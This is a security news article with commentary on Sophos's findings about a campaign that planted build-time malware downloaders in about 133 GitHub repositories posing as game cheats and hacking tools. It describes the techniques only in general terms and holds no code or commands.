Uncovering a Massive Malware Campaign Hidden in Open-Source GitHub Projects

Cybersecurity experts have recently exposed a large-scale, carefully orchestrated campaign that planted malicious code inside open-source projects hosted on GitHub. The operation revolves around a developer using the pseudonym ischhfd83, who embedded backdoors in more than 130 repositories. These projects were disguised as harmless or useful tools—mostly game cheats and hacking utilities—luring users into unknowingly downloading dangerous malware.

The investigation began when a Sophos customer asked about the safety of a GitHub project named Sakura RAT. Although the tool seemed broken on the surface, Sophos researchers discovered a hidden backdoor designed not to attack businesses but to target less-experienced cybercriminals and gamers seeking cheats. Sakura RAT contained a “PreBuild” script that automatically downloaded additional malware during the software compilation process—an advanced tactic that triggered a deeper probe into related repositories.

Sophos analysts traced the malware’s digital fingerprints, revealing a network of 141 repositories, 133 of which were infected. These repositories mostly impersonated game cheats (58%), hacking tools (24%), cryptocurrency utilities (5%), and various bot scripts. To create the illusion of genuine development, the attacker employed automation tools like GitHub Actions, flooding these projects with thousands of fake commits. Contributor profiles and activity patterns pointed to a coordinated and sophisticated structure rather than random acts.

The malware was hidden in layers of obfuscated code across multiple programming languages—PowerShell, Python, JavaScript, and even Windows screensavers. Infection chains often began with downloads hosted on GitHub releases or obscure paste sites. Once executed, these payloads delivered well-known threats such as Lumma Stealer or AsyncRAT, designed to steal sensitive information or take control of infected machines. Researchers suspect these repositories were promoted across underground forums and social media, targeting curious or naive users who might compile the code without suspicion.

This campaign highlights significant risks for open-source supply chains. Sophos suggests the attack might be connected to a broader Distribution-as-a-Service (DaaS) model identified earlier in 2024. Although some infrastructure overlaps with past cybercrime activities, the exact identity of the operator remains unknown. After reporting the malicious repositories and associated hosting sites, most have been removed, but the threat underscores the vulnerability of even widely trusted development platforms.

Interestingly, the campaign’s primary victims appear to be cheating gamers and amateur hackers. Yet, as the researchers point out, malware does not discriminate. Anyone experimenting with open-source code—whether for curiosity or learning—could become collateral damage in such attacks.

Over the course of this investigation, it becomes clear that the attacker leveraged automation and obfuscation techniques masterfully to stay under the radar. By embedding backdoors in tools that appear useful or desirable, they exploited the trust inherent in open-source communities. This tactic not only spreads malware but also threatens the integrity of the software supply chain itself, where dependencies and tools are reused across countless projects.

What Undercode Say:

This operation is a stark reminder of the evolving nature of cyber threats within open-source ecosystems. Attackers now go beyond simple phishing or exploit kits, adopting advanced methods like embedding malicious payloads directly in code repositories. This strategy exploits the growing trend among developers and hobbyists who rely heavily on public repositories for tools and libraries. It poses a systemic risk because once a compromised tool is integrated into a larger project, the infection can cascade through multiple software layers.

The use of automation to generate fake commits and maintain active project appearances is particularly clever. It suggests a level of resource investment more typical of organized cybercrime groups than individual hackers. This blurs the lines between amateur and professional threat actors and indicates the commercialization of malware distribution as a service. For organizations and individual developers, this means heightened vigilance is crucial. It is no longer enough to trust code simply because it’s open-source or widely used.

Another important angle is the victim profile. Targeting cheating gamers and novice hackers may seem niche, but these communities often overlap with larger threat actor ecosystems. Malware that begins in these circles can easily spread into corporate or government environments through indirect channels, such as shared tools or compromised developer machines. The attack also emphasizes the need for better education around compiling and running third-party code. Users must verify sources and inspect code carefully before execution.

From a supply chain security perspective, this event highlights a fundamental challenge: how to ensure the safety of thousands of dependencies that developers include in their projects. Traditional antivirus solutions may not catch deeply embedded backdoors, especially when code is obfuscated and infection chains are multi-layered. Solutions like automated code analysis, dependency scanning, and behavioral monitoring of compiled software are becoming essential.

Furthermore, the overlap with earlier DaaS models signals a trend where cybercriminal groups outsource parts of their operations, increasing scale and sophistication. This makes attribution and dismantling of these networks more complex. For defenders, sharing intelligence quickly and globally is critical to keep pace with these evolving threats.

In conclusion, this campaign serves as a wake-up call for both the open-source community and cybersecurity professionals. Trust and transparency in code are foundational but must be paired with rigorous security practices. As open-source software continues to dominate modern development, protecting it from malicious actors becomes a shared responsibility.

Fact Checker Results:

The Sophos investigation is well-documented and based on direct analysis of the malware code and repositories. The numbers of backdoored projects and infection methods align with other recent reports on cybercrime trends. The connection to Distribution-as-a-Service models has been observed by multiple cybersecurity firms in 2024, confirming the broader context of this threat.

Prediction:

Looking ahead, we can expect cybercriminals to increasingly weaponize open-source ecosystems, embedding malware in tools that appear legitimate and widely trusted. Automation and obfuscation will grow more sophisticated, making detection harder. Supply chain attacks will become a primary vector for large-scale breaches, pushing security measures towards real-time code auditing and community-driven vetting. The focus will shift from reactive malware removal to proactive trust verification, requiring stronger collaboration between platform providers, developers, and cybersecurity teams worldwide.